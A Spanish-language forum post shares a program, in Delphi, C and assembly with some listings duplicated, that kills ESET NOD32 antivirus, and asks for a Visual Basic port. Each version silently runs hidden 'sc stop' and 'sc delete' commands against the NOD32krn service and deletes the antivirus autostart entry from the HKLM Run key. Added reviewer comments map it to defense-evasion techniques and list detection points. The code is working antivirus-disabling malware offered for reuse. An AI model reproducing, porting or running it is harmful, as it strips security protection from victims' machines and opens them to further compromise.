
Les traigo un código para detener y eliminar al Nod32 de un plumazo, pero está en Delphi, ASM y C.
Si alguien lo puede transcribir a Visual Basic, os agradezco.
( no es mio, lo encontre en otro foro )
DELPHI Hecho por Kira
Código:
// Reviewer summary: windowless program that tampers with an installed ESET
// NOD32 antivirus. It runs two `sc` commands against the service named
// NOD32krn, then deletes the `nod32kui` value from the HKLM Run key.
// Defender view: this is ATT&CK T1562.001 (Impair Defenses: Disable or Modify
// Tools). It surfaces as cmd.exe/sc.exe process creation whose command line
// carries `stop`/`delete` plus a security-product service name (Security 4688
// with command-line auditing, Sysmon event 1), and as a value deletion under
// ...\CurrentVersion\Run (Sysmon event 12, if that key is in the config).
// NOTE(review): both steps presumably require administrative rights and are
// what AV self-protection is meant to block -- confirm for the deployed version.
type
HKEY = type LongWord;
REGSAM = type longWord;
DWORD = type longWord;
// Win32 entry points bound directly to kernel32/advapi32 (ANSI variants for
// the two registry calls that take strings).
function WinExec(lpCmdLine: PAnsiChar; uCmdShow: LongWord): LongWord; stdcall;
external 'kernel32.dll' name 'WinExec';
function RegOpenKeyEx(hKey: HKEY; lpSubKey: PChar;
ulOptions: DWORD; samDesired: REGSAM; var phkResult: HKEY): Longint; stdcall;
external 'advapi32.dll' name 'RegOpenKeyExA';
function RegDeleteValue(hKey: HKEY; lpValueName: PChar): Longint; stdcall;
external 'advapi32.dll' name 'RegDeleteValueA';
function RegCloseKey(hKey: HKEY): Longint; stdcall;
external 'advapi32.dll' name 'RegCloseKey';
const
HKEY_LOCAL_MACHINE = DWORD($80000002);
KEY_SET_VALUE = $0002;
var
accion:string;
Key : Hkey;
begin
// uCmdShow = 0 (SW_HIDE): neither command shows a console window.
// No return value is checked anywhere below, so the program cannot tell
// whether a step was blocked; the process-creation events occur either way.
accion:='Cmd.exe /c sc stop NOD32krn';
WinExec(pchar(accion),0);
accion:='Cmd.exe /c sc delete NOD32krn ';
WinExec(pchar(accion),0);
// Opens the machine-wide autostart key with write access only and removes one
// value; presumably `nod32kui` is the product's GUI autostart entry -- verify.
RegOpenKeyEx(HKEY_LOCAL_MACHINE, pChar('SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN'), 0, KEY_SET_VALUE, KEY);
RegDeleteValue(Key, PCHAR('nod32kui'));
RegCloseKey(Key);
// NOTE(review): from here the page repeats the Delphi listing above line for
// line (minus the leading `type` keyword). It appears to be a page-extraction
// duplicate, not a second program; the same detection points apply.
HKEY = type LongWord;
REGSAM = type longWord;
DWORD = type longWord;
function WinExec(lpCmdLine: PAnsiChar; uCmdShow: LongWord): LongWord; stdcall;
external 'kernel32.dll' name 'WinExec';
function RegOpenKeyEx(hKey: HKEY; lpSubKey: PChar;
ulOptions: DWORD; samDesired: REGSAM; var phkResult: HKEY): Longint; stdcall;
external 'advapi32.dll' name 'RegOpenKeyExA';
function RegDeleteValue(hKey: HKEY; lpValueName: PChar): Longint; stdcall;
external 'advapi32.dll' name 'RegDeleteValueA';
function RegCloseKey(hKey: HKEY): Longint; stdcall;
external 'advapi32.dll' name 'RegCloseKey';
const
HKEY_LOCAL_MACHINE = DWORD($80000002);
KEY_SET_VALUE = $0002;
var
accion:string;
Key : Hkey;
begin
accion:='Cmd.exe /c sc stop NOD32krn';
WinExec(pchar(accion),0);
accion:='Cmd.exe /c sc delete NOD32krn ';
WinExec(pchar(accion),0);
RegOpenKeyEx(HKEY_LOCAL_MACHINE, pChar('SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN'), 0, KEY_SET_VALUE, KEY);
RegDeleteValue(Key, PCHAR('nod32kui'));
RegCloseKey(Key);
C Hecho por Pseudoroot
Código:
#include <windows.h>
/*
 * Reviewer summary: GUI-subsystem entry point that creates no window and
 * tampers with an installed ESET NOD32 antivirus. It runs `sc stop` and
 * `sc delete` against the service named NOD32krn through cmd.exe, then
 * deletes the `nod32kui` value from the HKLM Run key.
 *
 * Defender view: ATT&CK T1562.001 (Impair Defenses: Disable or Modify Tools).
 * Look for cmd.exe/sc.exe process creation with `stop`/`delete` and a
 * security-product service name on the command line (Security 4688 with
 * command-line auditing, Sysmon event 1), and for a value deletion under
 * ...\CurrentVersion\Run (Sysmon event 12, if that key is in the config).
 * NOTE(review): both steps presumably need administrative rights and are what
 * AV self-protection is meant to block -- confirm for the deployed version.
 *
 * None of the four parameters is used. Always returns 0; no API result is
 * checked, so the caller learns nothing about whether a step was blocked.
 */
int WINAPI WinMain (HINSTANCE hThisInstance,
HINSTANCE hPrevInstance,
LPSTR lpszArgument,
int nFunsterStil)
{
char* accion1="Cmd.exe /c sc stop NOD32krn";
char* accion2="Cmd.exe /c sc delete NOD32krn";
/* Second argument 0 is SW_HIDE: the command's console window is not shown. */
WinExec(accion1,0);
Sleep(1000); // I added a delay so that the first API call takes effect correctly.
WinExec(accion2,0);
HKEY key;
/* Write-only handle to the machine-wide autostart key; one value is removed. */
RegOpenKeyEx(HKEY_LOCAL_MACHINE,"Software\\Microsoft\\Windows\\CurrentVersion\\run",0,KEY_SET_VALUE,&key);
RegDeleteValue(key,("nod32kui"));
RegCloseKey(key);
return 0;
}
/*
 * NOTE(review): this WinMain repeats the one directly above it line for line.
 * It appears to be a page-extraction duplicate, not a second program; the
 * same detection points (sc stop/delete against NOD32krn via cmd.exe, value
 * deletion under the HKLM Run key) apply.
 */
int WINAPI WinMain (HINSTANCE hThisInstance,
HINSTANCE hPrevInstance,
LPSTR lpszArgument,
int nFunsterStil)
{
char* accion1="Cmd.exe /c sc stop NOD32krn";
char* accion2="Cmd.exe /c sc delete NOD32krn";
WinExec(accion1,0);
Sleep(1000); // I added a delay so that the first API call takes effect correctly.
WinExec(accion2,0);
HKEY key;
RegOpenKeyEx(HKEY_LOCAL_MACHINE,"Software\\Microsoft\\Windows\\CurrentVersion\\run",0,KEY_SET_VALUE,&key);
RegDeleteValue(key,("nod32kui"));
RegCloseKey(key);
return 0;
}
ASM
Código:
; Reviewer summary: MASM-syntax version of the same antivirus-tampering
; routine. It runs `sc stop` and `sc delete` against the service named
; NOD32krn through cmd.exe, deletes the `nod32kui` value from the HKLM Run
; key, then exits with code 0.
; Defender view: ATT&CK T1562.001 (Impair Defenses: Disable or Modify Tools).
; Look for cmd.exe/sc.exe process creation with `stop`/`delete` and a
; security-product service name on the command line (Security 4688 with
; command-line auditing, Sysmon event 1), and for a value deletion under
; ...\CurrentVersion\Run (Sysmon event 12, if that key is in the config).
; NOTE(review): both steps presumably need administrative rights and are what
; AV self-protection is meant to block -- confirm for the deployed version.
.386
.model flat,stdcall
option casemap:none
include windows.inc
include kernel32.inc
include advapi32.inc
includelib kernel32.lib
includelib advapi32.lib
.data
; These four literals are the useful static indicators in a compiled sample.
accion1 db 'Cmd.exe /c sc stop NOD32krn',0
accion2 db 'Cmd.exe /c sc delete NOD32krn',0
ruta db 'SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN',0
dato db 'nod32kui',0
.data?
hkey DWORD ?
.code
mataNod:
; stdcall: arguments are pushed right to left. The 0 pushed first is
; uCmdShow (SW_HIDE), so neither command shows a console window.
; No return value in eax is inspected after any call.
push 0
push offset accion1
call WinExec
push 0
push offset accion2
call WinExec
; RegOpenKeyEx(HKEY_LOCAL_MACHINE, ruta, 0, KEY_SET_VALUE, &hkey)
push offset hkey
push KEY_SET_VALUE
push 0
push offset ruta
push HKEY_LOCAL_MACHINE
call RegOpenKeyEx
; RegDeleteValue(hkey, dato)
push offset dato
push hkey
call RegDeleteValue
push hkey
call RegCloseKey
push 0
call ExitProcess
; NOTE(review): from here the page repeats the assembly listing above line
; for line (minus the leading `.386` directive). It appears to be a
; page-extraction duplicate, not a second program; the same detection points
; apply.
.model flat,stdcall
option casemap:none
include windows.inc
include kernel32.inc
include advapi32.inc
includelib kernel32.lib
includelib advapi32.lib
.data
accion1 db 'Cmd.exe /c sc stop NOD32krn',0
accion2 db 'Cmd.exe /c sc delete NOD32krn',0
ruta db 'SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN',0
dato db 'nod32kui',0
.data?
hkey DWORD ?
.code
mataNod:
push 0
push offset accion1
call WinExec
push 0
push offset accion2
call WinExec
push offset hkey
push KEY_SET_VALUE
push 0
push offset ruta
push HKEY_LOCAL_MACHINE
call RegOpenKeyEx
push offset dato
push hkey
call RegDeleteValue
push hkey
call RegCloseKey
push 0
call ExitProcess
Si alguien lo sabe pasar a VB, os agradezco.













